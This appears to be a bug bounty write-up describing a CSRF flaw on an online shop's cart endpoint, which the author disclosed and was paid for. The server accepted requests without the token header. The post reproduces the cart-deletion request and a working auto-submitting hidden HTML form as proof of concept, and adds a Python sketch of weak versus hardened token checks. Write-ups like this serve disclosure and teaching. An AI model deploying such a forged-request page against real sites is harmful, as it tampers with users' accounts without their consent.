CSRF to Delete Products From Any User Cart Lead To $$$
Allah the Exalted said: "Allah will raise those who have believed among you and those who were given knowledge, by degrees. And Allah is Aware of what you do." (Surah Al-Mujadila, verse 11).
Hello Again Hunters! I’m excited to share something interesting I found while testing a private bug bounty program on an online shopping website.
I discovered a CSRF vulnerability that let me delete items from any user’s cart without their permission.
Let’s take a closer look at how it worked and why it matters.
Let’s dive in!
The application allows users to create custom projects (e.g., photo books, prints) and add them to their shopping cart.
Then I started testing what happens when a product is deleted from the shopping cart.
When a user removes a product from their cart, a POST request is sent to the following endpoint:
POST /cart/updatecart
Host: [redacted]
The request body contains several parameters that specify which Products to remove:
arrayOfProjectIdsToRemove=[ID]
&sourceProjectId=
&promotionName=
&isCouponRemoved=false
&order_id=ID
&service=cart
There is also a problem here: the request contains a header carrying a CSRF token, like this:
X-Csrf-Token: [token]
So the full request looks like this:
POST /cart/updatecart HTTP/2
Host: Target.com
Cookie: [your session cookie]
X-Csrf-Token: [token]
Content-Type: application/x-www-form-urlencoded
arrayOfProjectIdsToRemove=ID&sourceProjectId=&promotionName=&isCouponRemoved=false&order_id=ID&service=cart
Now we have two problems:
- The application's request has a CSRF token header: X-CSRF-Token
- The request contains two IDs: the arrayOfProjectIdsToRemove parameter and the order_id parameter
So Let’s Start with the CSRF Token…
What did I do?
The first thing I do when I see any CSRF token, and the easiest way to test it, is simply to delete the token and send the request without it, then check whether the server accepts the request without any error. If it does, the CSRF protection is bypassed the easy way.
So I removed the token, and the server returned 200 OK without any error!!!
Now the other problem: the request IDs...
As I said, the request has two parameters whose values are IDs.
First: arrayOfProjectIdsToRemove
This ID identifies the product I need to remove from the cart (the application gives every product an ID as its identifier). So all I need to know is which product belongs to the victim, and then I get its ID normally from any request that deals with that product.
The second parameter: order_id
I spent some time checking what this ID is and how the application supplies it to the request. After a while I saw that this ID exists for every product in the cart, but how could an attacker guess it? After some time I had no answer, so I decided to report it anyway, but when calculating the CVSS I set the attack complexity to High, because the attacker may need other attacks to obtain the order_id value.
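Both problems above come down to what the server checks. The following is an added example (my own, not the target application's code, and not from the original post) that models a cart-update handler as plain Python: the weak check only validates the CSRF token when the header happens to be present, which is exactly what lets "just delete the token" succeed, while the hardened check fails closed on a missing token, compares it in constant time, and additionally requires order_id to belong to the cart of the session that sent the request. The session store, token and order IDs are constructed sample values.

```python
import hmac

# Constructed in-memory session store (sample values, not from the target):
# session id -> CSRF token bound to that session, and the order IDs its cart owns.
SESSIONS = {
    "sess-victim": {"csrf": "tok-victim-123", "order_ids": {"ord-42"}},
}


def weak_check(headers: dict, session_id: str) -> bool:
    """Mirrors the flaw: the token is only validated when the header is present.
    A cross-site HTML form cannot add custom headers at all, so an attacker's
    form simply arrives without X-Csrf-Token and is accepted."""
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    token = headers.get("X-Csrf-Token")
    if token is not None and not hmac.compare_digest(token, session["csrf"]):
        return False
    return True  # missing header falls through to "accepted"


def hardened_check(headers: dict, form: dict, session_id: str) -> bool:
    """Fail closed: no token means rejection; the comparison is constant-time;
    and order_id must belong to this session's own cart (an IDOR guard)."""
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    token = headers.get("X-Csrf-Token")
    if token is None or not hmac.compare_digest(token, session["csrf"]):
        return False
    if form.get("order_id", "") not in session["order_ids"]:
        return False
    return True


if __name__ == "__main__":
    body = {"arrayOfProjectIdsToRemove": '["ID"]', "order_id": "ord-42", "service": "cart"}
    print("weak, no header:", weak_check({}, "sess-victim"))           # True (bypass)
    print("hardened, no header:", hardened_check({}, body, "sess-victim"))  # False
```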
The Full CSRF PoC…..
Since the request used normal form data, I knew I could build a simple HTML form that does the same thing. I made a page with a hidden form and some JavaScript to auto-submit it.
Here’s what the code looked like:
<html>
<body>
<!-- Hidden form that replays the same POST body as the legitimate cart request -->
<form action="https://[target]/cart/updatecart" method="POST">
<input type="hidden" name="arrayOfProjectIdsToRemove" value='["ID"]' />
<input type="hidden" name="sourceProjectId" value="" />
<input type="hidden" name="promotionName" value="" />
<input type="hidden" name="isCouponRemoved" value="false" />
<input type="hidden" name="order_id" value="ID" />
<input type="hidden" name="service" value="cart" />
</form>
<script>
// Hide the PoC URL in the address bar, then auto-submit the form
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
The Program Response…..
I reported it and waited some time, but what I still can't believe: the H1 triage closed the report as Duplicate, which was so bad for me.
But here I noticed something strange......
The triage team didn't mention any information about the original report:
no title, no status, no date!!! Strange, right?
So I sent a comment saying I needed to know the original report info!!
And after some days, I got a notification saying the report had been reopened!!! The triage team also validated the bug again and sent it to the internal team.
After 2 days the internal team triaged the report!!!!
And one day later they paid for it with $$$!!!
But What is the severity here ?
You can see the CVSS Above
I hope anyone reading this has been able to learn something new or refresh their memory. Remember to put God first, and to test everything. In hacking, no idea is stupid until it clearly fails. I wish you good luck, and if you find a bug with this technique, I'd love to hear about it.
My linkedin :) https://www.linkedin.com/in/yassin-hamdi-elfeki0/
— @ GET /BountyOrDie